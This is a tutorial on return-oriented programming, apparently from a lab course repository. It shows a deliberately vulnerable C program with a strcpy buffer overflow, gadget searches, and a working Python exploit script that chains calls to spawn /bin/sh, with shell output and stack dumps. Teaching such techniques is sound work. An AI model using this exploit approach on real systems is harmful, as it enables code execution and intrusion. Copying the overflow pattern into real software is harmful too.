Skip to content

Latest commit

 

History

History
 
 

Folders and files

NameName
Last commit message
Last commit date

parent directory

..
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

\newpage

Return-Oriented Programming (ROP)

Return-Oriented Programming or ROP for short combines a large number of short instruction sequences to build gadgets that allow arbitrary computation. From [3]:

Return Oriented Programming (ROP) is a powerful technique used to counter common exploit prevention strategies. In particular, ROP is useful for circumventing Address Space Layout Randomization (ASLR) and NX/DEP. When using ROP, an attacker uses his/her control over the stack right before the return from a function to direct code execution to some other location in the program. Except on very hardened binaries, attackers can easily find a portion of code that is located in a fixed location (circumventing ASLR) and which is executable (circumventing DEP). Furthermore, it is relatively straightforward to chain several payloads to achieve (almost) arbitrary code execution.


Note: as in previous tutorials, there's a docker container that facilitates reproducing the work of this tutorial. The container can be built with:

docker build -t basic_cybersecurity5:latest .

and runned with:

docker run --privileged -it basic_cybersecurity5:latest

The content used for this tutorial will be heavily relying on [3]. The tutorial's objective is to learn about the basic concept of return-oriented programming (ROP).

From [9]:

NX/DEP

DEP stands for data execution prevention, this technique marks areas of memory as non executable. Usually the stack and heap are marked as non executable thus preventing attacker from executing code residing in these regions of memory.

ASLR

ASLR stands for Address Space Layer Randomization. This technique randomizes address of memory where shared libraries , stack and heap are maapped at. This prevent attacker from predicting where to take EIP , since attacker does not knows address of his malicious payload.

Stack Canaries

In this technique compiler places a randomized guard value after stack frame’s local variables and before the saved return address. This guard is checked before function returns if it’s not same then program exits.

From ret-to-libc to ROP

From [3],

With ROP, it is possible to do far more powerful things than calling a single function. In fact, we can use it to run arbitrary code6 rather than just calling functions we have available to us. We do this by returning to gadgets, which are short sequences of instructions ending in a ret.

We can also use ROP to chain function calls: rather than a dummy return address, we use a pop; ret gadget to move the stack above the arguments to the first function. Since we are just using the pop; ret gadget to adjust the stack, we don't care what register it pops into (the value will be ignored anyways). As an example, we'll exploit the following binary

char string[100];

void exec_string() {
    system(string);
}

void add_bin(int magic) {
    if (magic == 0xdeadbeef) {
        strcat(string, "/bin");
    }
}

void add_sh(int magic1, int magic2) {
    if (magic1 == 0xcafebabe && magic2 == 0x0badf00d) {
        strcat(string, "/sh");
    }
}

void vulnerable_function(char* string) {
    char buffer[100];
    strcpy(buffer, string);
}

int main(int argc, char** argv) {
    string[0] = 0;
    vulnerable_function(argv[1]);
    return 0;
}

We can see that the goal is to call add_bin, then add_sh, then exec_string. When we call add_bin, the stack must look like:

high | <argument>       |
low  | <return address> |

In our case, we want the argument to be 0xdeadbeef we want the return address to be a pop; ret gadget. This will remove 0xdeadbeef from the stack and return to the next gadget on the stack. We thus have a gadget to call add_bin(0xdeadbeef) that looks like:

high  | 0xdeadbeef            |
      | <address of pop; ret> |
      | <address of add_bin>  |

(this is a gadget)

Since add_sh(0xcafebabe, 0x0badf00d) use two arguments, we need a pop; pop; ret:

high  | 0x0badf00d                 |
      | 0xcafebabe                 |
      | <address of pop; pop; ret> |
      | <address of add_sh>        |

(note how gadgets get chained with those ones executing first in the lowest memory addresses (closer to the stack pointer))

Putting all of it together:

high    | <address of exec_string>     |
        | 0x0badf00d                   |
        | 0xcafebabe                   |
        | <address of pop; pop; ret>   |
        | <address of add_sh>          |
        | 0xdeadbeef                   |
        | <address of pop; ret>        |
        | <address of add_bin>         |
        | 0x42424242 (fake saved %ebp) |
        | 0x41414141 ...               |
        |   ... (0x6c bytes of 'A's)   |
        |   ... 0x41414141             |

With this diagram in mind, let's figure out the addresses. First the functions:

>>> p &exec_string
$1 = (void (*)()) 0x804844d <exec_string>
>>> p &add_bin
$2 = (void (*)(int)) 0x8048461 <add_bin>
>>> p &add_sh
$3 = (void (*)(int, int)) 0x804849c <add_sh>

To obtain the gadgets and identify the right one. To do so we could use dumprop from PEDA [11], or rp++ [12]:

A total of 162 gadgets found.
0x0804870b: adc al, 0x41 ; ret  ;  (1 found)
0x08048497: add al, 0x00 ; pop edi ; pop ebp ; ret  ;  (1 found)
0x0804830a: add al, 0x08 ; add byte [eax], al ; add byte [eax], al ; jmp dword [0x0804A00C] ;  (1 found)
0x08048418: add al, 0x08 ; add ecx, ecx ; rep ret  ;  (1 found)
0x080483b4: add al, 0x08 ; call eax ;  (1 found)
0x0804843d: add al, 0x08 ; call eax ;  (1 found)
0x080483f1: add al, 0x08 ; call edx ;  (1 found)
0x08048304: add al, 0x08 ; jmp dword [0x0804A008] ;  (1 found)
0x080483b0: add al, 0x24 ; and al, 0xA0 ; add al, 0x08 ; call eax ;  (1 found)
0x080483ed: add al, 0x24 ; and al, 0xA0 ; add al, 0x08 ; call edx ;  (1 found)
0x08048302: add al, 0xA0 ; add al, 0x08 ; jmp dword [0x0804A008] ;  (1 found)
0x080482ff: add bh, bh ; xor eax, 0x0804A004 ; jmp dword [0x0804A008] ;  (1 found)
0x080482fd: add byte [eax], al ; add bh, bh ; xor eax, 0x0804A004 ; jmp dword [0x0804A008] ;  (1 found)
0x0804830c: add byte [eax], al ; add byte [eax], al ; jmp dword [0x0804A00C] ;  (1 found)
0x0804851a: add byte [eax], al ; add byte [eax], al ; leave  ; ret  ;  (1 found)
...

In particular we filter by pop:

root@74929f891a04:~# ./rp++ -f rop6 -r 3 | grep pop
0x08048497: add al, 0x00 ; pop edi ; pop ebp ; ret  ;  (1 found)
0x080482f0: add byte [eax], al ; add esp, 0x08 ; pop ebx ; ret  ;  (1 found)
0x080485a1: add byte [eax], al ; add esp, 0x08 ; pop ebx ; ret  ;  (1 found)
0x0804859d: add ebx, 0x00001A63 ; add esp, 0x08 ; pop ebx ; ret  ;  (1 found)
0x080482f2: add esp, 0x08 ; pop ebx ; ret  ;  (1 found)
0x080485a3: add esp, 0x08 ; pop ebx ; ret  ;  (1 found)
0x08048578: fild word [ebx+0x5E5B1CC4] ; pop edi ; pop ebp ; ret  ;  (1 found)
0x08048493: imul ebp, dword [esi-0x3A], 0x5F000440 ; pop ebp ; ret  ;  (1 found)
0x080482f3: les ecx,  [eax] ; pop ebx ; ret  ;  (1 found)
0x080485a4: les ecx,  [eax] ; pop ebx ; ret  ;  (1 found)
0x08048495: mov byte [eax+0x04], 0x00000000 ; pop edi ; pop ebp ; ret  ;  (1 found)
0x080484d3: mov dword [eax], 0x0068732F ; pop edi ; pop ebp ; ret  ;  (1 found)
0x0804849a: pop ebp ; ret  ;  (1 found)
0x080484da: pop ebp ; ret  ;  (1 found)
0x0804857f: pop ebp ; ret  ;  (1 found)
0x080482f5: pop ebx ; ret  ;  (1 found)
0x080485a6: pop ebx ; ret  ;  (1 found)
0x08048499: pop edi ; pop ebp ; ret  ;  (1 found)
0x080484d9: pop edi ; pop ebp ; ret  ;  (1 found)
0x0804857e: pop edi ; pop ebp ; ret  ;  (1 found)
0x0804857d: pop esi ; pop edi ; pop ebp ; ret  ;  (1 found)

From the content above, we pick 0x080485a6 (pop; ret) and 0x08048499 (pop; pop; ret).

Alternative, using objdump -d rop6, we can find most of this information visually.

With all this information, we go ahead and build a script that puts it all together:

#!/usr/bin/python

import os
import struct

# These values were found with `objdump -d a.out`.
pop_ret = 0x080485a6
pop_pop_ret = 0x08048499
exec_string = 0x804844d
add_bin = 0x8048461
add_sh = 0x804849c

# First, the buffer overflow.
payload =  "A"*0x6c
payload += "BBBB"

# The add_bin(0xdeadbeef) gadget.
payload += struct.pack("I", add_bin)
payload += struct.pack("I", pop_ret)
payload += struct.pack("I", 0xdeadbeef)

# The add_sh(0xcafebabe, 0x0badf00d) gadget.
payload += struct.pack("I", add_sh)
payload += struct.pack("I", pop_pop_ret)
payload += struct.pack("I", 0xcafebabe)
payload += struct.pack("I", 0xbadf00d)

# Our final destination.
payload += struct.pack("I", exec_string)

print(payload)

os.system("./rop6 \"%s\"" % payload)

Executing this:

root@5daa0de3a6d9:~# python rop6_exploit.py
?AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBa?ᆳޜ?????
 M?
# ls
checksec.sh  rop1    rop1_noprotection	rop2.c		   rop3    rop4    rop5    rop6    rop6_exploit.py
peda	     rop1.c  rop2		rop2_noprotection  rop3.c  rop4.c  rop5.c  rop6.c  rp++
# uname -a
Linux 5daa0de3a6d9 4.9.87-linuxkit-aufs #1 SMP Wed Mar 14 15:12:16 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

Let's analyze the memory in more detail to understand the script's behavior:

─── Memory ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
            esp
0xffffd6d0 [ec d6 ff ff] 39 d9 ff ff 01 00 00 00 38 d9 ff f7 ....9.......8...
0xffffd6e0 00 00 00 00 00 00 00 00 00 00 00 00 41 41 41 41 ............AAAA
0xffffd6f0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd700 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd710 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd720 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd730 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd740 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
                                    ebp           ret
0xffffd750 41 41 41 41 41 41 41 41 [42 42 42 42] [61 84 04 08] AAAAAAAABBBBa...
0xffffd760 a6 85 04 08 ef be ad de 9c 84 04 08 99 84 04 08 ................
0xffffd770 be ba fe ca 0d f0 ad 0b 4d 84 04 08 00 ca e3 f7 .... .. M.......
0xffffd780 02 00 00 00 14 d8 ff ff 20 d8 ff ff 6a ae fe f7 ........ ...j...
0xffffd790 02 00 00 00 14 d8 ff ff b4 d7 ff ff 18 a0 04 08 ................
0xffffd7a0 2c 82 04 08 00 00 fd f7 00 00 00 00 00 00 00 00 ,...............
0xffffd7b0 00 00 00 00 c3 b1 4c c6 d3 d5 76 fe 00 00 00 00 ......L...v.....
0xffffd7c0 00 00 00 00 00 00 00 00 02 00 00 00 50 83 04 08 ............P...

Originally and after copying the argument (generated from the python script) to the stack, the base pointer ebp has the value 0x42424242 (or "BBBB") which will lead to a segmentation error when the stack returns. Note that we've rewritten the return address with the address of add_bin, thereby, after we reach the ret instruction we'll head there.

The first few instructions of function add_bin are as follows:

0x08048461 add_bin+0 push   %ebp
0x08048462 add_bin+1 mov    %esp,%ebp
0x08048464 add_bin+3 push   %edi
0x08048465 add_bin+4 cmpl   $0xdeadbeef,0x8(%ebp)

Leaving the stack as:

─── Memory ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0xffffd6d0 ec d6 ff ff 39 d9 ff ff 01 00 00 00 38 d9 ff f7 ....9.......8...
0xffffd6e0 00 00 00 00 00 00 00 00 00 00 00 00 41 41 41 41 ............AAAA
0xffffd6f0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd700 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd710 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd720 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd730 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd740 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
                                    esp           ebp
0xffffd750 41 41 41 41 41 41 41 41 [00 00 00 00] [42 42 42 42] AAAAAAAA....BBBB
            ret              magic
0xffffd760 [a6 85 04 08 ef] [be ad de 9c] 84 04 08 99 84 04 08 ................
0xffffd770 be ba fe ca 0d f0 ad 0b 4d 84 04 08 00 ca e3 f7 .... .. M.......
0xffffd780 02 00 00 00 14 d8 ff ff 20 d8 ff ff 6a ae fe f7 ........ ...j...
0xffffd790 02 00 00 00 14 d8 ff ff b4 d7 ff ff 18 a0 04 08 ................
0xffffd7a0 2c 82 04 08 00 00 fd f7 00 00 00 00 00 00 00 00 ,...............
0xffffd7b0 00 00 00 00 c3 b1 4c c6 d3 d5 76 fe 00 00 00 00 ......L...v.....
0xffffd7c0 00 00 00 00 00 00 00 00 02 00 00 00 50 83 04 08 ............P...

note that the registers ebp and edi have been pushed to the stack having the stack pointer esp at 0xffffd758. Moreover, the return address of this function will be 0x080485a6 (ret) and magic is taken directly from the stack. After add_bin executes, the function returns to 0x080485a6 which we previously engineer to point to the following instructions:

0x080485a6 _fini+18 pop    %ebx
0x080485a7 _fini+19 ret    

with a stack that looks like what follows:

─── Memory ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0xffffd6d0 ec d6 ff ff 39 d9 ff ff 01 00 00 00 38 d9 ff f7 ....9.......8...
0xffffd6e0 00 00 00 00 00 00 00 00 00 00 00 00 41 41 41 41 ............AAAA
0xffffd6f0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd700 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd710 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd720 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd730 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd740 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd750 41 41 41 41 41 41 41 41 00 00 00 00 42 42 42 42 AAAAAAAA....BBBB
                        esp
0xffffd760 a6 85 04 08 [ef be ad de] 9c 84 04 08 99 84 04 08 ................
0xffffd770 be ba fe ca 0d f0 ad 0b 4d 84 04 08 00 ca e3 f7 .... .. M.......
0xffffd780 02 00 00 00 14 d8 ff ff 20 d8 ff ff 6a ae fe f7 ........ ...j...
0xffffd790 02 00 00 00 14 d8 ff ff b4 d7 ff ff 18 a0 04 08 ................
0xffffd7a0 2c 82 04 08 00 00 fd f7 00 00 00 00 00 00 00 00 ,...............
0xffffd7b0 00 00 00 00 c3 b1 4c c6 d3 d5 76 fe 00 00 00 00 ......L...v.....
0xffffd7c0 00 00 00 00 00 00 00 00 02 00 00 00 50 83 04 08 ............P...

After executing the first instruction (0x080485a6 _fini+18 pop %ebx), the stack looks like:

─── Memory ───────────────────────────────────────────────────────────────────────────────────────────────────────────────────────────
0xffffd6d0 ec d6 ff ff 39 d9 ff ff 01 00 00 00 38 d9 ff f7 ....9.......8...
0xffffd6e0 00 00 00 00 00 00 00 00 00 00 00 00 41 41 41 41 ............AAAA
0xffffd6f0 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd700 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd710 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd720 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd730 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd740 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 AAAAAAAAAAAAAAAA
0xffffd750 41 41 41 41 41 41 41 41 00 00 00 00 42 42 42 42 AAAAAAAA....BBBB
                                    esp
0xffffd760 a6 85 04 08 ef be ad de [9c 84 04 08] 99 84 04 08 ................
0xffffd770 be ba fe ca 0d f0 ad 0b 4d 84 04 08 00 ca e3 f7 .... .. M.......
0xffffd780 02 00 00 00 14 d8 ff ff 20 d8 ff ff 6a ae fe f7 ........ ...j...
0xffffd790 02 00 00 00 14 d8 ff ff b4 d7 ff ff 18 a0 04 08 ................
0xffffd7a0 2c 82 04 08 00 00 fd f7 00 00 00 00 00 00 00 00 ,...............
0xffffd7b0 00 00 00 00 c3 b1 4c c6 d3 d5 76 fe 00 00 00 00 ......L...v.....
0xffffd7c0 00 00 00 00 00 00 00 00 02 00 00 00 50 83 04 08 ............P...

The stack pointer esp now points to the address of add_sh. With this setup, the next instruction (0x080485a7 _fini+19 ret) will in fact make the instruction pointer eip point to the address of add_sh. The flow of the stack continues similarly, with return addresses pointing to sections in the code that "adjust the stack offset" so that the flow goes as desired.

Resources